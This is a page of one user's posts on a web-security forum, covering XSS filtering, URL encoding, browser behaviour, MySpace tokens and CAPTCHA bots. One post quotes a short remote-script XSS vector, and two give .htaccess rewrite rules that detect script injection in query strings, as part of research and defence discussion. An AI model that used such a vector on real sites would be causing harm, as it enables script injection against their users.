Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Ways to improve page rank, or deceptively get more users to your websites or away from your competition. Where you can discuss SEO (search engine optimization) issues as it relates to computer security. 

Pages: 12345...LastNext
Current Page: 1 of 36
Results 1 - 30 of 1069
7 years ago
jungsonn
@RSnake, Yeh that might be right, I'm in no position to even think about these browser issues, it's not my job and certainly far from any personal expertise. And I quickly made some false assumptions about it. It's really harder then I thought it would be. But I can't help get the impression the browser vendors can solve such issues, only not sure how.
Forum: Projects
7 years ago
jungsonn
Ooops.. I need some sleep forgive me, I meant the &lt; conversion of < not the %3C. But actually, it brought me to the same issue more or less. Yeh that's a tough one, I thought about it some time but that would require some content negotiation. But can it be done like if %3C is inputted inside an URI to always convert it back to &lt; on the screen? like htmlentities does or htmls
Forum: Projects
7 years ago
jungsonn
But trev, if it's encoded, you can store it encoded into the database, and you still can still post HTML, because the forum shows the nonprintable chars: %3C you've send So if you post HTML it's being encoded, well that's the whole point isn't it? Why should it be decode back to printable chars serverside if it's in a posted array? Cause almost every GLOBAL var your need to encode anyway.
Forum: Projects
7 years ago
jungsonn
Yeh I'm moving on thin ice here ^^, I meant "less/greater sign" though it sounds so akward and always call them brackets. But let's view it a little different, I though about this; the less/greater signs: < > which are send through the browser are encoded, and when it echoes into a vulnerable script it is decoded (not 100% correct, but forgive me on that). So in the URI a:
Forum: Projects
7 years ago
jungsonn
It could be a great option in browsers. @Kyran, yes that would be a nice way. I understand that it will thow up certain limits, but what I am trying to understand is: do sites use specialchars like brackets in URI's? Maybe what Kyran said is a nice status quo: if brackets are detected the browser could throw an alert screen: possible attack etc... blabla bla.. continue or shut this
Forum: Projects
7 years ago
jungsonn
Yeh, I'm more leaning to the browser developers these days because really... who need such things in it's URI ? Isn't it the case that browser vendors have the power to change all these issues? I never seen an URI with brackets in them like: index.php?page=>blaaah< blaaaah. Could we do without these chars in the URI?
Forum: Projects
7 years ago
jungsonn
It's amazing a browser will render this... that should be forbidden. ^_^
Forum: Projects
7 years ago
jungsonn
Wowie... didn't know that, is this on the cheat sheet also? Any other suggestions I must keep on eye on? maybe filtering for .js in this case. But, I thought it to use it as a small protection, or small IDS. cause most people will try the first few then -if they are clever enough- will reside to the complex ones you gave. not 100% yet, but i'mm getting there :)
Forum: Projects
7 years ago
jungsonn
<script/src=//ha.ckers.org/xss.js @RSnake Wow....that thing really works? :-||
Forum: Projects
7 years ago
jungsonn
True RSnake, but only a handfull of people know this. Your'e one of them. But that's a really small fix. The only difference is: %22 or a space. RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E|%22)
Forum: Projects
7 years ago
jungsonn
I've done a similar thing for the reques URI's in a .htaccess maybe you haven't seen it: .htaccess Options +FollowSymLinks RewriteEngine On RewriteCond %{QUERY_STRING} (\"|%22).*(\>|%3E|<|%3C).* RewriteRule ^(.*)$ log.php RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) RewriteRule ^(.*)$ log.php RewriteCond %{QUERY_STRING} (javascript:).*(\;).* RewriteRule
Forum: Projects
7 years ago
jungsonn
Sorry, but I can insert "javascript" also without the added nulls, so that's useless. and even when it goes though a sanitizing script you still can't do a thing because you still need chars like: < >'" to do some real harm. The < get's converted. like it should. I cannot make it spit out < again. If someone can do this, I really like to hear it, because about a few m
Forum: XSS Info
7 years ago
jungsonn
Yeh and they probably call it a Gookie instead of cookie.
Forum: SQL and Code Injection
7 years ago
jungsonn

Forum: OMG Ponies
7 years ago
jungsonn
Haha wow I never thought MySpace would use base64, That's a classic security through wrong obscurity example. I thought they would be smarter and generate random tokens. They say they MySpace cannot detect it, but that is a false statement, ofcorse they can detect it by decoding it back which they probably already do to fetch content based upon the parameters in it. - I'm not sure because I ne
Forum: CSRF and Session Info
7 years ago
jungsonn
Yeh exactly kuza55. I've been auditing the Firefox code for about 3 months in 2006 and it's hard to find new entry points. There where some serious flaws which resulted in local file execution but that was quickly fixed.
Forum: CSRF and Session Info
7 years ago
jungsonn
Well you can't insert the less and greater sign if you insert it as "demo input", they just convert to their entities (as expected). So I can't think a way to abuse this. The example only shows a hardcoded XSS vector, so I don't get the point.
Forum: XSS Info
7 years ago
jungsonn
Haha you always get the most funniest ones! I wonder you must talk about it somewhere on your site then? ^^ or at least use a few words?
Forum: OMG Ponies
7 years ago
jungsonn
Quotemiroslav.stampar(at)google.com U work at Google? ^^
Forum: SQL and Code Injection
7 years ago
jungsonn
Botmaster uses proxies, and in fact I found the proxylist which botmaster utilizes. I came accross it through some good searching and googledorking but I didn't save the proxy list. Anyhow it was pretty huge. Still i think when one can juggle the contents of your source it's pretty hard to regex on for them. Like using multiple hidden random singup forms. And rotate them around in the source.
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
Oh sure it is, and really was. It's a great discussion and tons of fun to wrap my mind around. Learned a good piece here. I was just ranting some stuff I had in my mind, trying to put things into context again and to see the actual risk. Which included the use of Javascript to attack it -which obviously works- but is tough to deploy it on a large *automated* scale. So that got me thinking. And
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
I think they don't know, It's a big world outthere with millions of users. Sure they can track them if they wanted, but my fair guess is that we are just a statistic, a number in some big ass charts they have. On the point of correlating people to data, really, it's amazing how little this is being done. Or people aren't just that smart to do it efficiently, I think this is really overestimate
Forum: Search Engine Hacking and SEO
7 years ago
jungsonn
how+come+when+i+tryed+to+log+in+my+myspace+it+says+my+myspace+user+is+blocked+and+won%27t+be+able+to+go+in
Forum: OMG Ponies
7 years ago
jungsonn
I think you can't, it translates to a different address on that server. Files are not shared on a subdomain. Maybe you can try to call the full server path, just a thought.
Forum: OMG Ponies
7 years ago
jungsonn
Eh.. I still can't figure out how one can exploit it, care to explain it? cause what happens in your example is zero.
Forum: XSS Info
7 years ago
jungsonn
Why not just: SLA.CKERS.ORG without all the textual crap, like a small logo in the left corner. It's stylish and not so bourgeoises.
Forum: OMG Ponies
7 years ago
jungsonn
Most of the time it's quicker to do a Google lookup like: "CMS exploit" usually gives you tons of info and saves you a lot of time. Cause most of the time when I look for bugs I have to install the damn thing and that eats away precious time. :)
Forum: SQL and Code Injection
7 years ago
jungsonn
It's an interesting ambiance I regularly get around security people, Don't get me wrong but: that many people think that if something is broken it isn't secure. Like some scripters think -and email me- when they bypassed some scripts I wrote. And say, hey it's broken! and I reply: I knew that, if you asked me first I could given you the holes it would saved you tons of free time. :) Well cle
Forum: Robots/Spiders/CAPTCHAs, oh my
7 years ago
jungsonn
That MySpace is so populair... I really don't get it. I have no account there and not interested in it either. What's the whole point, and what's up with hijacking anothers acount? what do you got when you jack an account there?
Forum: Intro
7 years ago
jungsonn
Do they also hardcoded the paths? like: include("server/var/file.php"); or did they do this, which is somewhat semi hardcoded also: $root = "server/var/"; include($root/file.php"); Or: include($_SERVER['PHP_SELF]."file.php"); since these are vulnerable too. And do they use unset() anywhere?
Forum: SQL and Code Injection
Pages: 12345...LastNext
Current Page: 1 of 36